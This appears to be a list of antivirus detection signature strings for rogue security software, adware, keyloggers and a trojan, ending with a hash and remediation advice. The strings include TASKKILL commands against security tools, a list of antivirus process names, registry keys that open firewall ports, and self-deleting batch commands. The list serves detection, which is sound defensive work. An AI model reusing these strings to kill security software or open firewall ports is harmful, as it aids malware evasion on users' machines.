- Software\Classes\E404.e404mgr.1 (REGKEY)
- ?This program will download and install XP Antivirus on your PC. (PEHSTR)
- scui.cpl (PEHSTR)
- $$$$.bat (PEHSTR)
- QWProtect.DLL (PEHSTR)
- )http://winantiviruspro.net/buy.php?affid= (PEHSTR)
- $Spyware.IEMonster activity detected. (PEHSTR)
- EYour system is probably infected with version of Spyware.IEMonster.b. (PEHSTR)
- ://scanreporting.com (PEHSTR)
- www.WinDesktopDefender.com/ (PEHSTR)
- /httpss/setup.php? (PEHSTR)
- This program will download and install Antivirus 2009 on your PC. (PEHSTR)
- \AVInstaller (PEHSTR)
- JavaScript (PEHSTR)
- IEDefender.DLL (PEHSTR)
- /index.php?id= (PEHSTR)
- /presale/2/index.php?id= (PEHSTR)
- /blocked.php?id= (PEHSTR)
- /cnt.jpg (PEHSTR_EXT)
- %s\%c%c%c%c%c.%s (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion (PEHSTR_EXT)
- http://85 (PEHSTR_EXT)
- InitializeSecurityDescriptor (PEHSTR_EXT)
- HttpOpenRequestA (PEHSTR_EXT)
- HttpAddRequestHeadersA (PEHSTR_EXT)
- http://213. (PEHSTR_EXT)
- /dladv (PEHSTR_EXT)
- .php?code1= (PEHSTR_EXT)
- tool.exe (PEHSTR_EXT)
- tool.txt (PEHSTR_EXT)
- tibs.php (PEHSTR_EXT)
- tibs.exe (PEHSTR_EXT)
- IIt may be possible to skip this check using the /NCRC command line switch (PEHSTR)
- del /F /Q imex.bat (PEHSTR)
- User-Agent: (PEHSTR)
- Connecting ... (PEHSTR)
- /NOTICE TO USER: THIS END USER LICENSE AGREEMENT (PEHSTR)
- User-Agent: ITDialer (PEHSTR_EXT)
- EngineAP.dll (PEHSTR)
- \Release\SSEngine.pdb (PEHSTR)
- AntivirusPro\SSEngine\Release (PEHSTR)
- d_REGBACKUP.sbk (PEHSTR)
- Engine.dat file does not exist (PEHSTR)
- Software\AntivirusPro (PEHSTR)
- antivirus-pro-site.com (PEHSTR)
- C:\SSEngine.dll (PEHSTR)
- !Repair process has been completed (PEHSTR)
- RAdwarePro\NewEngine\Rebrands\AntivirusDoktor\Bin\release\Antivirus Doktor 2009.pdb (PEHSTR)
- Software\AntivirusDoktorNE (PEHSTR)
- AntiMalware_Pro.exe (PEHSTR)
- AntiMalware_Pro.pdb (PEHSTR)
- //join1.php (PEHSTR)
- latestversion/123.exe (PEHSTR)
- latestversion/AntiMalwarePro.exe (PEHSTR_EXT)
- Anti-Virus-Pro.install (PEHSTR_EXT)
- Anti-Virus-Pro successfully instaled. (PEHSTR_EXT)
- EngineAP.dll (PEHSTR_EXT)
- Engine failed to load. Error:%d (PEHSTR_EXT)
- \Antivirus XP 2008 (PEHSTR)
- Mutex.dll (PEHSTR)
- MachineKey.dll (PEHSTR)
- \VirusIsolator\ (PEHSTR)
- \Antivirus XP (PEHSTR_EXT)
- delself.bat (PEHSTR_EXT)
- partypoker.com (PEHSTR_EXT)
- mediafire.com (PEHSTR_EXT)
- adultfriendfinder.com (PEHSTR_EXT)
- skyrock.com (PEHSTR_EXT)
- \database.dat (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved (PEHSTR_EXT)
- /buy2/ (PEHSTR_EXT)
- /purchase2/ (PEHSTR_EXT)
- \pin.vbs " (PEHSTR_EXT)
- database.dat (PEHSTR_EXT)
- OLEACC.dll (PEHSTR_EXT)
- </HTML> (PEHSTR_EXT)
- NeoLite Executable File Compressor (PEHSTR_EXT)
- SOFTWARE\Spytech (PEHSTR)
- %s\sacache\skeys%d.log (PEHSTR)
- Spytech SpyAgent Keystroke (PEHSTR)
- %ssacache\skeys.log (PEHSTR)
- &Content-Type: text/html; name=logs.txt (PEHSTR)
- whieshm.dll (PEHSTR_EXT)
- whAgent.exe (PEHSTR_EXT)
- Software\webHancer (PEHSTR_EXT)
- whiehlpr.dll (PEHSTR_EXT)
- whiedc.STATIC (PEHSTR_EXT)
- whiedc.dll (PEHSTR_EXT)
- wbhshare.dll (PEHSTR_EXT)
- webhdll.dll (PEHSTR_EXT)
- regwebh.dll (PEHSTR_EXT)
- whAgentPageData (PEHSTR_EXT)
- programs\wbhshare.dll (PEHSTR_EXT)
- #!$[whAgent]$!# (PEHSTR_EXT)
- Software\webHancer\CC (PEHSTR_EXT)
- webHancer Customer Companion Information (PEHSTR_EXT)
- software\webhancer (PEHSTR_EXT)
- webHancer Survey Companion (PEHSTR_EXT)
- whSurvey.ini (PEHSTR_EXT)
- \Programs\whsurvey.exe (PEHSTR_EXT)
- \Programs\whagent.exe (PEHSTR_EXT)
- \Programs\webhdll.dll (PEHSTR_EXT)
- dUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705) (PEHSTR)
- 'action.php?p=%d&id=%s&system=%s&hwid=%s (PEHSTR)
- 4Serial key accepted. (PEHSTR)
- You must restart application. (PEHSTR)
- /protectyourpc-11.com/cgi-bin/cycle_report25.cgi (PEHSTR)
- 8Windows has found spy programs running on your computer! (PEHSTR)
- %Running of application is impossible. (PEHSTR)
- AWindows has detected malicious programs running on your computer. (PEHSTR)
- http://%s/r.php (PEHSTR)
- http://%s/sp.php?adv=%s&who=S (PEHSTR)
- (Please activate your antivirus software. (PEHSTR)
- dbsinit.exe (PEHSTR_EXT)
- paint.exe (PEHSTR_EXT)
- wab.exe (PEHSTR_EXT)
- ppp4.dat (PEHSTR_EXT)
- WinSta0\Default (PEHSTR_EXT)
- \Program Files (PEHSTR_EXT)
- \Internet Explorer (PEHSTR_EXT)
- \iexplore.exe (PEHSTR_EXT)
- stbup.exe (PEHSTR)
- %s\%s /preupdate (PEHSTR)
- SmileyHookAPIExe\ (PEHSTR_EXT)
- AxGifAnimator.DLL (PEHSTR_EXT)
- SmileyCore.dll (PEHSTR_EXT)
- LoadMyDll %s failed! (PEHSTR_EXT)
- HookAPINT.dll (PEHSTR_EXT)
- lsass.exe (PEHSTR_EXT)
- services.exe (PEHSTR_EXT)
- smss.exe (PEHSTR_EXT)
- general.useragent.extra (PEHSTR_EXT)
- CurrentVersion\Internet Settings\User Agent\Post Platform (PEHSTR_EXT)
- %s&p.pixelType=%s&hdsn=%s&m=%s&lo=%s&ii=%s (PEHSTR_EXT)
- p.pixelType=%s&a=%s&s=%s&p.price=%s&p.pixel=%s& (PEHSTR_EXT)
- .?AUIFunRedirector@@ (PEHSTR_EXT)
- .?AVCFunModule@@ (PEHSTR_EXT)
- \DoubleD (FOLDERNAME)
- key.dat (PEHSTR_EXT)
- screenshots.dat (PEHSTR_EXT)
- app.dat (PEHSTR_EXT)
- clipboard.dat (PEHSTR_EXT)
- prnt.dat (PEHSTR_EXT)
- Global\SettingsFileMap (PEHSTR_EXT)
- Global\InfoFileMapApp (PEHSTR_EXT)
- Global\InfoFIleMapSrv (PEHSTR_EXT)
- Global\ActActionUnInst (PEHSTR_EXT)
- Global\ActActionDrive (PEHSTR_EXT)
- \sysuser (FOLDERNAME)
- System\ControlSet001\Services\MSSystem (REGKEY)
- System\CurrentControlSet\Services\MSSystem (REGKEY)
- SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\\47658:TCP (REGKEY)
- SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\\47658:TCP (REGKEY)
- SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\%SYSTEM%\sysuser\system.exe (REGKEY)
- SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\%SYSTEM%\sysuser\system.exe (REGKEY)
- http://open/?url= (PEHSTR)
- its.not.ok (PEHSTR)
- Zbsrv.exe (PEHSTR)
- SBUSA.exe (PEHSTR)
- SADF.exe (PEHSTR)
- clientaxproxy.dll (PEHSTR)
- &comp_id= (PEHSTR)
- Software\Zango (PEHSTR)
- downloads.180solutions.com/ (PEHSTR)
- clickpotato.tv/ (PEHSTR)
- ClickPotatoLiteAX.Info (PEHSTR)
- could not connect to ads.aspx (PEHSTR)
- .popping a GAD ad - ad id (%s) keyword id (%s) (PEHSTR)
- %Downloads.180solutions.com/keywords/ (PEHSTR)
- nowhere.180solutions.com (PEHSTR)
- \\.\Scsi%d: (PEHSTR_EXT)
- pinballcorp.com/downloads (PEHSTR_EXT)
- SAHook.dll (PEHSTR_EXT)
- HOOK_DLL: AD process ID (0x%08X) equals (PEHSTR_EXT)
- HOOK_DLL: Hide Ad (PEHSTR_EXT)
- Computer safety (PEHSTR)
- 3is about to perform a full scan of your hard drive. (PEHSTR)
- \completescan_pal (PEHSTR)
- \sold_pal (PEHSTR)
- !ExecuteFile="m5vmi6n606vqx6x.exe" (PEHSTR)
- !ExecuteFile="3yo4wo7q1jn6257.exe" (PEHSTR)
- /writelog2.php?did= (PEHSTR)
- ^Security Essentials detected programs that may compromise your privacy or damage your computer (PEHSTR)
- filelocal:/?/%TEMP%\getkey.sys (PEHSTR)
- OThe firewall module blocks network attacks and other types of online intrusion. (PEHSTR)
- SPlease remove all malware and perform the "Cybercriminal activity test" once again. (PEHSTR)
- 0was forced to shut down due to security reasons. (PEHSTR)
- /activate.php (PEHSTR)
- httpPayform (PEHSTR_EXT)
- httpPayform1 (PEHSTR_EXT)
- <b>Recommended:</b><br>Please click "Remove All" button (PEHSTR_EXT)
- /zz.php? (PEHSTR_EXT)
- comfile (PEHSTR_EXT)
- %2.5f (PEHSTR_EXT)
- 'hidden' name='projectId' value='%d'/><input type='hidden' name='partnerId' (PEHSTR_EXT)
- .wgett.co.cc/ (PEHSTR_EXT)
- /SILENT (PEHSTR_EXT)
- .exe" /S (PEHSTR_EXT)
- #\OfferBox\config.xml (PEHSTR_EXT)
- /trackstats.php (PEHSTR_EXT)
- \OB.exe (PEHSTR_EXT)
- \count_total.txt (PEHSTR_EXT)
- http: (PEHSTR_EXT)
- .uz4.net/log34756.php (PEHSTR_EXT)
- GET /bad.php?w=%u&i=%s HTTP/1.0 (PEHSTR_EXT)
- stat.php?w=%u&i=%s&a=%u (PEHSTR_EXT)
- update.db (PEHSTR_EXT)
- new/1.exe (PEHSTR_EXT)
- User-Agent: Opera/6 (Windows NT %u.%u; U; LangID=%x; %s) (PEHSTR_EXT)
- Our_Agent (PEHSTR)
- \dxdiag.exe (PEHSTR)
- HSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders (PEHSTR)
- \Startup\dxdiag.exe (PEHSTR)
- Our_Agent (PEHSTR_EXT)
- \ctfmon (PEHSTR_EXT)
- AVGIDSAgent.exe (PEHSTR_EXT)
- AVGIDSMonitor.exe (PEHSTR_EXT)
- 360tray;avgnt;avgaurd;avcenter;adam;AgentSvr;AntiArp; (PEHSTR_EXT)
- %USERPROFILE%\Application Data\~ (PEHSTR_EXT)
- TASKKILL /F /IM NaverAgent.exe /T (PEHSTR_EXT)
- TASKKILL /F /IM nsvmon.npc /T (PEHSTR_EXT)
- \restart.bat (PEHSTR_EXT)
- <script src="http://google.ru/js (PEHSTR_EXT)
- User-Agent: Test Agent (PEHSTR_EXT)
- /file/upload.php (PEHSTR_EXT)
- default.cfg (PEHSTR_EXT)
- metrika.yandex.ru (PEHSTR_EXT)
- </script> (PEHSTR_EXT)
- [UDLL] (PEHSTR_EXT)
- [DLL] (PEHSTR_EXT)
- `Dell.Foundation.eDell.Common.dll (PEHSTR)
- Dell.Foundation.eDell.Common (PEHSTR)
- `Dell.Foundation.eDell.Configuration.dll (PEHSTR)
- Dell.Foundation.eDell.Configuration (PEHSTR)
- `Dell.Foundation.Agent.Plugins.eDell.dll (PEHSTR)
- Dell.Foundation.Agent.Plugins.eDell (PEHSTR)
- explorer.exe http://uninstall.mysafesavings.com (PEHSTR_EXT)
- Microsoft\WindowsLogger\winlogger.exe (PEHSTR_EXT)
- Software\MySafeSavings (PEHSTR_EXT)
- jsXjif (PEHSTR_EXT)
- jS3 (PEHSTR_EXT)
- jsYjaf (PEHSTR_EXT)
- network.proxy.type (PEHSTR_EXT)
- http=%s:%s (PEHSTR_EXT)
- User-Agent (PEHSTR_EXT)
- .?AVCFindingDiscountApp@@ (PEHSTR_EXT)
- \Microsoft\Savman\savman.exe (FILEPATH)
- \Microsoft\WindowsLogger\winlogger.exe (FILEPATH)
- \Microsoft\Windows\WindowsAccManager\smass.exe (FILEPATH)
- \Microsoft\Windows\WindowsAccManager\account.exe (FILEPATH)
- \Windows NT\Accessories\RuntimeManager\runtimemanager.exe (FILEPATH)
- (x86)\Windows NT\Accessories\RuntimeManager\runtimemanager.exe (FILEPATH)
- \MSSavings (FOLDERNAME)
- \SafeSavings (FOLDERNAME)
- (x86)\MSSavings (FOLDERNAME)
- \Windows Discount (FOLDERNAME)
- &N\_x (SNID)
- ^C(\F (SNID)
- /tlx/ (SNID)
- y/(";H (SNID)
- ,C\jn (SNID)
- 0/_"_s (SNID)
- )ed\.. (SNID)
- \gm[w: (SNID)
- HJS (SNID)
- P|R\3a (SNID)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

40a59422fa486c7ae214d6e816c2fd00bf4d75c081993a49c4bc22bb0165b7fe

Immediately isolate the endpoint from the network. Remove the associated files, services, and registry keys identified in the analysis. Block the command-and-control domains at the network firewall. Due to the nature of the trojan, re-imaging the system is strongly recommended to ensure complete remediation.